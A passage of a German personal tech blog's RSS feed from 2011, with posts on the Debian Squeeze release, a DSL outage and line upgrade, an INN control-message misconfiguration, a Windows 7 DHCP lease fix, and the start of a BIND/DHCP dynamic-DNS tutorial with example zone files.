&lt;p&gt;Mein &lt;a title=&quot;Ein neuer Homeserver&quot; href=&quot;http://th-h.de/blog/archives/1664-Ein-neuer-Homeserver.html&quot;&gt;neuer Rechner&lt;/a&gt; läuft &lt;a title=&quot;Installation von Debian Squeeze&quot; href=&quot;http://th-h.de/blog/archives/1665-Installation-von-Debian-Squeeze.html&quot;&gt;bekanntlich&lt;/a&gt; bereits unter Debian Squeeze; mit den Updates der bestehenden Server werde ich hingegen noch ein wenig warten, bis möglicherweise bestehende Probleme erkannt und behoben sind, Erfahrungen von anderen Updatern vorliegen, ich wieder über ein größeres Budget an freier Zeit verfüge und mal ein Wochenende für eventuell notwendig werdende Reparaturen zur Verfügung habe.&lt;/p&gt;
&lt;p&gt;Doch Debian hat nicht nur released - man hat die Gelegenheit genutzt und auch direkt den Webseiten ein &lt;a title=&quot;New look for Debian&#039;s websites&quot; href=&quot;http://th-h.de/blog/exit.php?url_id=1857&amp;amp;entry_id=1679&quot;  onmouseover=&quot;window.status=&#039;http://www.debian.org/News/2011/20110205b&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;neues Gesicht&lt;/a&gt; gegeben, also den lange geplanten und vorbereiteten Relaunch pünktlich zum Release-Wochenende umgesetzt.&lt;/p&gt;  
    </content:encoded>

    <pubDate>Sun, 06 Feb 2011 18:36:00 +0100</pubDate>
    <guid isPermaLink="false">http://th-h.de/blog/archives/1679-guid.html</guid>
    <category>debian</category>
<category>squeeze</category>

</item>
<item>
    <title>Vereinzelte DSL-Einwahlprobleme am Wochenende</title>
    <link>http://th-h.de/blog/archives/1675-Vereinzelte-DSL-Einwahlprobleme-am-Wochenende.html</link>
            <category>Bits'n'Bytes</category>
    
    <comments>http://th-h.de/blog/archives/1675-Vereinzelte-DSL-Einwahlprobleme-am-Wochenende.html#comments</comments>
    <wfw:comment>http://th-h.de/blog/wfwcomment.php?cid=1675</wfw:comment>

    <slash:comments>1</slash:comments>
    <wfw:commentRss>http://th-h.de/blog/rss.php?version=2.0&amp;type=comments&amp;cid=1675</wfw:commentRss>
    

    <author>thh@inter.net (Thomas Hochstein)</author>
    <content:encoded>
    &lt;p&gt;Mein DSL-Anbieter teilte gestern abend mit:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Aufgrund einiger Kundenanfragen wurden wir auf vereinzelte DSL-Einwahl-Probleme zu uns aufmerksam gemacht. Dies betraf allerdings nur einen kleinen Teil unserer DSL-Kunden (ca. 5%), so dass wir hier erst genauer analysieren mussten, da kein generelles Problem vorlag.&lt;/p&gt;
&lt;p&gt;Laut derzeitigem Kenntnis- und Analysestand gab es im Laufe des gestrigen Abends und heutigen Tages eine Störung der Weiterleitung der DSL-Einwahl-Anfragen einiger (nicht aller) Kunden von der T-Com zu uns (was allerdings noch unbestätigt ist). Dies betraf jedoch nicht bestehende DSL-Sitzungen (sprich wenn Sie bereits eingewählt waren).&lt;/p&gt;
&lt;p&gt;Ob Ihr Zugang betroffen war oder nicht, können wir leider technisch bedingt an dieser Stelle nicht zutreffend sagen, dieses Mailing erhalten Sie daher vorsorglich.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Doch, doch - das traf schon einen der Richtigen. &lt;img src=&quot;http://th-h.de/blog/templates/default/img/emoticons/smile.png&quot; alt=&quot;:-)&quot; style=&quot;display: inline; vertical-align: bottom;&quot; class=&quot;emoticon&quot; /&gt; Aber jetzt kann ich immerhin beruhigt festhalten, daß das Problem nicht bei der häuslichen Einwahltechnik lag - und das ganze Debugging für die Katz war. &lt;img src=&quot;http://th-h.de/blog/templates/default/img/emoticons/smile.png&quot; alt=&quot;:-)&quot; style=&quot;display: inline; vertical-align: bottom;&quot; class=&quot;emoticon&quot; /&gt;&lt;br /&gt;&lt;/p&gt;  
    </content:encoded>

    <pubDate>Mon, 31 Jan 2011 07:30:00 +0100</pubDate>
    <guid isPermaLink="false">http://th-h.de/blog/archives/1675-guid.html</guid>
    
</item>
<item>
    <title>Kaum macht man es richtig, schon funktioniert es!</title>
    <link>http://th-h.de/blog/archives/1674-Kaum-macht-man-es-richtig,-schon-funktioniert-es!.html</link>
            <category>Bits'n'Bytes</category>
    
    <comments>http://th-h.de/blog/archives/1674-Kaum-macht-man-es-richtig,-schon-funktioniert-es!.html#comments</comments>
    <wfw:comment>http://th-h.de/blog/wfwcomment.php?cid=1674</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://th-h.de/blog/rss.php?version=2.0&amp;type=comments&amp;cid=1674</wfw:commentRss>
    

    <author>thh@inter.net (Thomas Hochstein)</author>
    <content:encoded>
    &lt;p&gt;Dieser Tage stellte ich fest, daß mein Newsserver offensichtlich keine &lt;a title=&quot;Wikipedia: Control-Message&quot; href=&quot;http://th-h.de/blog/exit.php?url_id=1795&amp;amp;entry_id=1674&quot;  onmouseover=&quot;window.status=&#039;http://de.wikipedia.org/wiki/Control-Message&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Steuernachrichten&lt;/a&gt; mehr ausführt. Aber warum bloß?&lt;/p&gt; 
&lt;p&gt;Die Rücknahme einiger jüngerer Änderungen - die sicherstellen sollten, daß die Steuernachrichten nicht nur ausgeführt, sondern mir auch gemailt werden (mit Dank an den Widder!) - brachte keine Lösung. Also bin ich zu systematischen Debugging übergegangen; dank fehlenden Loggings anhand des Einstreuens von Ausgabeanweisungen in eine Kopie des zuständigen Scripts (&lt;em&gt;controlchan&lt;/em&gt;). Stunden später[tm] stellte sich dann als Ursache ... ein Bedienerfehler heraus (wie immer). Wenn man Steuernachrichten für eine bestimmte Hierarchie verwerfen will, dann sollte man den Namen der Hierarchie nicht nur als Kommentar in die &lt;em&gt;control.ctl&lt;/em&gt; eintragen, sondern für den entsprechenden Eintrag auch ein Muster wie &amp;#8220;hierarchie.*&amp;#8221; verwenden. &amp;#8220;*&amp;#8221; alleine führt nicht zum erwünschten Ergebnis (sondern zum Verwerfen &lt;u&gt;aller&lt;/u&gt; Steuernachrichten für &lt;u&gt;alle&lt;/u&gt; Hierarchien). &lt;img src=&quot;http://th-h.de/blog/templates/default/img/emoticons/normal.png&quot; alt=&quot;:-|&quot; style=&quot;display: inline; vertical-align: bottom;&quot; class=&quot;emoticon&quot; /&gt;&lt;br /&gt;&lt;/p&gt;  
    </content:encoded>

    <pubDate>Sat, 29 Jan 2011 17:21:46 +0100</pubDate>
    <guid isPermaLink="false">http://th-h.de/blog/archives/1674-guid.html</guid>
    <category>inn</category>
<category>usenet</category>

</item>
<item>
    <title>Gib Gas, das macht Spaß!</title>
    <link>http://th-h.de/blog/archives/1672-Gib-Gas,-das-macht-Spass!.html</link>
            <category>Bits'n'Bytes</category>
    
    <comments>http://th-h.de/blog/archives/1672-Gib-Gas,-das-macht-Spass!.html#comments</comments>
    <wfw:comment>http://th-h.de/blog/wfwcomment.php?cid=1672</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://th-h.de/blog/rss.php?version=2.0&amp;type=comments&amp;cid=1672</wfw:commentRss>
    

    <author>thh@inter.net (Thomas Hochstein)</author>
    <content:encoded>
    &lt;p&gt;Als wir vor einigen Jahren unsere neue Wohnung bezogen haben, fiel mir die Sorge um den Telekommunikationsanschlussfragen zu. Damals an einem Wohnort die spurtstarke Leistung eines DSL-1000-Anschlusses gewohnt und am anderen immerhin mit DSL-2000 verwöhnt stellte sich zu meiner großen Freude heraus, daß am neuen Wohnsitz neben VDSL in allen Arten auch DSL-6000 und DSL-16000 verfügbar waren. Nachdem ich ein Freund des Verbleibs beim rosa Riesen bin, war ein passender Tarif schnell gebucht (die inbegriffene Festnetzflatrate, mit der ich selbst wenig anfangen kann, hat sich mittlerweile übrigens auch als segensreich erwiesen ... mehr sage ich dazu jetzt nicht &lt;img src=&quot;http://th-h.de/blog/templates/default/img/emoticons/wink.png&quot; alt=&quot;;-)&quot; style=&quot;display: inline; vertical-align: bottom;&quot; class=&quot;emoticon&quot; /&gt;), und nach einigen kleineren Schwierigkeiten &lt;em&gt;*räusper*&lt;/em&gt; war dann auch technisch und organisatorisch alles im grünen Bereich. Einziges Manko: Die nach der Online-Verfügbarkeitsprüfung angeblich bereitstehende 16.000er-Anbindung konnte man nicht schalten - aber 6.000 ist ja immer noch mehr als 2.000.&lt;/p&gt; 
&lt;p&gt;So genossen wir - beide keine großen &amp;#8220;Sauger&amp;#8221; - die letzten Jahre das stabile Surfvergnügen, bis ich dieser Tage einmal im Rahmen der diversen &lt;a href=&quot;http://th-h.de/blog/archives/1663-Erledigungen,-Erledigungen,-nicht-als-Erledigungen-....html&quot; title=&quot;Erledigungen, Erledigungen, nichts als Erledigungen&quot;&gt;Erledigungen&lt;/a&gt; auch einen Abstecher zum Kundencenter machte, um mir einen Überblick über die zur Verfügung stehenden neuen Tarife und anderen Optionen zu machen. Höchst erfreut konnte ich dabei dann feststellen, daß es mittlerweile möglich ist, ohne Tarifänderung und ohne Aufpreis die (im Tarif enthaltene, aber bei Einzug nicht zur Verfügung stehende) 16.000er-Leitung zu schalten. Das habe ich dann auch direkt beauftragt, eine Auftragsbestätigung für einen Schalttermin in einigen Wochen erhalten, die kurz darauf auch schriftlich bestätigt wurde ... und dann die Angelegenheit prompt wieder vergessen.&lt;/p&gt; 
&lt;p&gt;Bis mir heute morgen wieder einfiel, daß der Umschalttermin eigentlich schon um sein müßte. Und was soll ich sagen?&lt;/p&gt; 
&lt;p&gt; &lt;/p&gt;
&lt;div class=&quot;serendipity_imageComment_center&quot; style=&quot;width: 610px;&quot;&gt; 
&lt;div class=&quot;serendipity_imageComment_img&quot;&gt;&lt;!-- s9ymdb:370 --&gt;&lt;img width=&quot;610&quot; height=&quot;302&quot; class=&quot;serendipity_image_center&quot; src=&quot;http://th-h.de/blog/uploads/20110128.jpg&quot; /&gt;&lt;/div&gt; 
&lt;div class=&quot;serendipity_imageComment_txt&quot;&gt;Speedtest von wieistmeineip.de&lt;/div&gt; 
&lt;/div&gt;Wir sind jetzt im Geschwindigkeitsrausch. &lt;img src=&quot;http://th-h.de/blog/templates/default/img/emoticons/smile.png&quot; alt=&quot;:-)&quot; style=&quot;display: inline; vertical-align: bottom;&quot; class=&quot;emoticon&quot; /&gt;&lt;br /&gt; 
&lt;p&gt;&amp;#160;&lt;/p&gt;  
    </content:encoded>

    <pubDate>Fri, 28 Jan 2011 07:16:00 +0100</pubDate>
    <guid isPermaLink="false">http://th-h.de/blog/archives/1672-guid.html</guid>
    
</item>
<item>
    <title>isc-dhcpd, Windows-7-Clients und kein DHCP?</title>
    <link>http://th-h.de/blog/archives/1667-isc-dhcpd,-Windows-7-Clients-und-kein-DHCP.html</link>
            <category>Bits'n'Bytes</category>
    
    <comments>http://th-h.de/blog/archives/1667-isc-dhcpd,-Windows-7-Clients-und-kein-DHCP.html#comments</comments>
    <wfw:comment>http://th-h.de/blog/wfwcomment.php?cid=1667</wfw:comment>

    <slash:comments>2</slash:comments>
    <wfw:commentRss>http://th-h.de/blog/rss.php?version=2.0&amp;type=comments&amp;cid=1667</wfw:commentRss>
    

    <author>thh@inter.net (Thomas Hochstein)</author>
    <content:encoded>
    &lt;p&gt;Manche Dinge muß man nicht verstehen - und sie sind auch furchtbar schwer einzugrenzen.&lt;/p&gt; 
&lt;p&gt;Man stelle sich folgende Situation vor:&lt;/p&gt; 
&lt;p&gt; Ein Netzwerk, in dem ein Server (Debian Squeez) und ein Desktop (WinXP) stehen, außerdem ein WLAN-Accesspoint, über den zwei Laptops (einmal WinXP, einmal Win7) an das Netz angebunden sind. Auf dem Server läuft ein &lt;em&gt;isc-dhcpd&lt;/em&gt;, also der DHCP-Server des ISC, der die Clients mit IP-Adressen versorgt. Beide Rechner, die unter Windows XP laufen, bekommen problemlos DHCP-Leases, und alles ist gut.&lt;/p&gt; 
&lt;p&gt;Jetzt kommt der Rechner unter Windows 7 hinzu - und nichts geht mehr. Nicht nur, daß der Rechner keine IP-Adresse zugewiesen bekommt; auch der andere, über WLAN angebundene Laptop verliert während dieser Versuche, per DHCP eine Adresse zu bekommen, reproduzierbar die Verbindung zum Server, so daß SSH-Verbindungen abbrechen und die DNS-Auflösung nicht mehr funktioniert. Andere bestehende Verbindungen von diesem XP-Laptop aus bleiben aber bestehen. Im Log des DHCP-Servers spielen der Win7-Client und der Server Pingpong mit &lt;em&gt;DHCPDISCOVER&lt;/em&gt; und &lt;em&gt;DHCPOFFER&lt;/em&gt;, kommen aber nie weiter zu &lt;em&gt;DHCPREQUEST&lt;/em&gt; und &lt;em&gt;DHCPACK&lt;/em&gt;, d.h. der Client fragt nach einer IP-Adresse, er bekommt eine angeboten, registriert das aber nicht und wiederholt seine Anfrage ad nauseam.&lt;br /&gt;&lt;/p&gt; 
&lt;p&gt;Nach langem Lesen und Probieren wird als Probe aufs Exempel ein weiterer Laptop mit Win7 ins Netz gebracht, um auszuschließen, daß das Problem beim Laptop liegt - und tatsächlich, auch dieser Rechner bekommt per DHCP keine IP-Adresse zugewiesen! Das Problem ist also offenbar ein generelles.&lt;/p&gt; 
&lt;p&gt;Googeln wird bei diesem Thema dadurch erschwert, daß es haufenweise Treffer gibt, die aber im wesentlichen alle mit diesem Problem nichts zu tun haben und oft nur die Unkenntnis der Beteiligten über DHCP, Windows und diverse andere Gegenstände erkennbar machen. &lt;em&gt;*seufz*&lt;/em&gt;&lt;/p&gt; 
&lt;p&gt;Hätte jemand zu diesem Problem auf Anhieb einen Lösungsansatz gehabt? (Außer dem Mitschneiden des Netzwerkverkehrs zwischen dem Client und dem nicht-funktionsfähigen DHCP-Server im Vergleich zum Verkehr zwischen dem Client und einem funktionierenden Server.)&lt;br /&gt;&lt;/p&gt; &lt;p&gt;Die &lt;a href=&quot;http://th-h.de/blog/exit.php?url_id=1771&amp;amp;entry_id=1667&quot; title=&quot;http://www.mail-archive.com/gnhlug-discuss@mail.gnhlug.org/msg27531.html&quot;  onmouseover=&quot;window.status=&#039;http://www.mail-archive.com/gnhlug-discuss@mail.gnhlug.org/msg27531.html&#039;;return true;&quot; onmouseout=&quot;window.status=&#039;&#039;;return true;&quot;&gt;Lösung&lt;/a&gt; des Problems fand sich dann am Ende doch via Google (im Archiv einer Mailingliste der &lt;em&gt;Greater New Hampshire Linux User Group&lt;/em&gt;) - und hat keine für mich erkennbare Verbindung zum Problem:&lt;/p&gt;
&lt;p&gt;Es ist falsch, in der DHCP-Konfiguration das Statement &lt;em&gt;server-identifier&lt;/em&gt; auf den Namen des DHCP-Servers zu setzen; dort muß offenbar entweder dessen IP-Adresse oder ein per DNS auflösbarer Hostname stehen (oder am besten gar nichts); den Namen des DHCP-Servers kann man stattdessen mittels &lt;em&gt;server-name&lt;/em&gt; setzen. Wenn man diese Änderung in der Konfiguration des &lt;em&gt;dhcpd&lt;/em&gt; vornimmt und ihn neu startet, ist urplötzlich alles gut ...&lt;/p&gt;
&lt;p align=&quot;right&quot;&gt;&lt;u&gt;Keywords:&lt;/u&gt; DHCP isc-dhcpd Windows Seven Vista Win7 fail no lease no IP address problem&lt;br /&gt;&lt;/p&gt; 
    </content:encoded>

    <pubDate>Sat, 22 Jan 2011 08:42:00 +0100</pubDate>
    <guid isPermaLink="false">http://th-h.de/blog/archives/1667-guid.html</guid>
    <category>dhcp</category>
<category>dns</category>
<category>linux</category>
<category>windows</category>

</item>
<item>
    <title>DHCP-Server und automatische DNS-Zone-Updates</title>
    <link>http://th-h.de/blog/archives/1666-DHCP-Server-und-automatische-DNS-Zone-Updates.html</link>
            <category>Bits'n'Bytes</category>
    
    <comments>http://th-h.de/blog/archives/1666-DHCP-Server-und-automatische-DNS-Zone-Updates.html#comments</comments>
    <wfw:comment>http://th-h.de/blog/wfwcomment.php?cid=1666</wfw:comment>

    <slash:comments>1</slash:comments>
    <wfw:commentRss>http://th-h.de/blog/rss.php?version=2.0&amp;type=comments&amp;cid=1666</wfw:commentRss>
    

    <author>thh@inter.net (Thomas Hochstein)</author>
    <content:encoded>
    &lt;p&gt;Für lokale Netze ist ein DHCP-Server eine nützliche Einrichtung, ermöglicht er doch die automatische Adreßvergabe. Die meisten Consumer-DSL-Router (und nicht nur diese) haben entsprechende Funktionalitäten eingebaut; noch schöner und flexibler ist es aber natürlich, selbst einen entsprechenden Dienst bereitzustellen, weil man ihn dann genau so konfigurieren kann, wie man ihn gerne hätte, um neben der automatischen Vergabe von IP-Adressen auch bestimmten Rechnern feste Adressen zuzuweisen und zugleich im internen Netz eine Namensauflösung zu organisieren.&lt;/p&gt; 
&lt;p&gt;Dafür bedarf es im Prinzip dreierlei:&lt;/p&gt; 
&lt;ul&gt; 
&lt;li&gt;Zunächst benötigt man einen DHCP-Server (&lt;em&gt;dhcpd&lt;/em&gt;), bspw. den des ISC, der dann so konfiguriert werden muß, daß er die erwünschten Adressen an die Clients zuweist.&lt;/li&gt; 
&lt;li&gt;Dann benötigt man einen DNS-Server, bspw. den BIND des ISC, der dann so konfiguriert werden muß, daß er Namen im lokalen Netz zu IPs auflöst und umgekehrt lokale IPs zu den richtigen Namen.&lt;/li&gt; 
&lt;li&gt;Und letztlich muß man in einem zweiten Schritt die beiden so miteinander verheiraten, daß der DHCP-Server dem DNS-Server erzählt, welche IPs er an welche Maschinen dynamisch vergeben hat.&lt;/li&gt; 
&lt;/ul&gt; 
&lt;p&gt;All das ist vergleichsweise einfach unter Debian möglich.&lt;/p&gt; 
&lt;p&gt;Im folgenden Beispiel gehe ich davon aus, daß das lokale Netz den IP-Bereich von 10.0.0.1-10.0.0.254 (&lt;em&gt;10.0.0.1/24&lt;/em&gt;) umfassen soll und die Domain &lt;em&gt;example.org&lt;/em&gt; verwendet wird. Der Host, auf dem DHCP- und DNS-Server laufen, heißt &lt;em&gt;server.example.org&lt;/em&gt; und hat die (fest konfigurierte) IP-Adresse &lt;em&gt;10.0.0.1&lt;/em&gt;.&lt;br /&gt;&lt;/p&gt; &lt;h3&gt;1. Installation und Einrichtung des DNS-Servers&lt;/h3&gt; 
&lt;p&gt;&lt;code&gt;aptitude -r install bind9&lt;/code&gt;&lt;/p&gt; 
&lt;p&gt; Die DNS-Zonen für das lokale Netz sollen später dynamische Updates zulassen; aufgrund der dann notwendigen Schreibrechte für den Benutzer &lt;em&gt;bind&lt;/em&gt; auf diese Dateien darf man sie unter Debian nicht in &lt;em&gt;/etc/bind/&lt;/em&gt; anlegen, sondern im dafür vorgesehenen Verzeichnis &lt;em&gt;/var/lib/bind&lt;/em&gt;. Also legen wir eine Zone-Datei &lt;em&gt;/var/lib/bind/example.org&lt;/em&gt; für die Vorwärtsauflösung an, in der auch schon die Maschinen stehen, die feste IP-Adressen vergeben bekommen sollen:&lt;/p&gt; 
&lt;blockquote&gt; 
&lt;p&gt;$ORIGIN .&lt;br /&gt;$TTL 604800&amp;#160;&amp;#160;&amp;#160;&amp;#160; ; 1 week&lt;br /&gt;example.org&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; IN SOA&amp;#160; server.example.org. hostmaster.server.example.org. (&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; 2011012101 ; serial&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; 28800&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; ; refresh (8 hours)&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; 7200&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; ; retry (2 hours)&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; 604800&amp;#160;&amp;#160;&amp;#160;&amp;#160; ; expire (1 week)&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; 39600&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; ; minimum (11 hours)&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; )&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; NS&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; server.example.org.&lt;br /&gt;$ORIGIN example.org.&lt;br /&gt;server&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; A&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; 10.0.0.1&lt;br /&gt;desktop&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; A&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; 10.0.0.11&lt;br /&gt;laptop1&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; A&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; 10.0.0.21&lt;br /&gt;laptop2&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; A&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; 10.0.0.22&lt;/p&gt; 
&lt;/blockquote&gt; 
&lt;p&gt;Und dasselbe dann für die Rückwärtsauflösung:&lt;/p&gt; 
&lt;blockquote&gt; 
&lt;p&gt;$ORIGIN .&lt;br /&gt;$TTL 604800&amp;#160;&amp;#160;&amp;#160;&amp;#160; ; 1 week&lt;br /&gt;0.0.10.in-addr.arpa&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; IN SOA&amp;#160; server.example.org. hostmaster.server.example.org. (&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; 2011012101 ; serial&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; 28800&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; ; refresh (8 hours)&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; 7200&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; ; retry (2 hours)&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; 604800&amp;#160;&amp;#160;&amp;#160;&amp;#160; ; expire (1 week)&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; 39600&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; ; minimum (11 hours)&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; )&lt;br /&gt;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; NS&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; server.example.org.&lt;br /&gt;$ORIGIN 0.0.10.in-addr.arpa.&lt;br /&gt;1&amp;#160;&amp;#160;&amp;#160; &amp;#160;&amp;#160;&amp;#160; &amp;#160;&amp;#160;&amp;#160; PTR&amp;#160;&amp;#160;&amp;#160; server.example.org.&lt;br /&gt;11&amp;#160;&amp;#160;&amp;#160; &amp;#160;&amp;#160;&amp;#160; &amp;#160;&amp;#160;&amp;#160; PTR&amp;#160;&amp;#160;&amp;#160; desktop.example.org.&lt;br /&gt;21&amp;#160;&amp;#160;&amp;#160; &amp;#160;&amp;#160;&amp;#160; &amp;#160;&amp;#160;&amp;#160; PTR&amp;#160;&amp;#160;&amp;#160; laptop1.example.org.&lt;br /&gt;22&amp;#160;&amp;#160;&amp;#160; &amp;#160;&amp;#160;&amp;#160; &amp;#160;&amp;#160;&amp;#160; PTR&amp;#160;&amp;#160;&amp;#160; laptop2.example.org.&lt;/p&gt; 
&lt;/blockquote&gt; 
&lt;p&gt;Jetzt werden die Zonen in die Nameserver-Konfiguration eingebunden, und zwar durch Anpassen der Datei &lt;em&gt;/etc/bind/named.conf.local&lt;/em&gt;:&lt;br /&gt;&lt;/p&gt; 
&lt;blockquote&gt; 
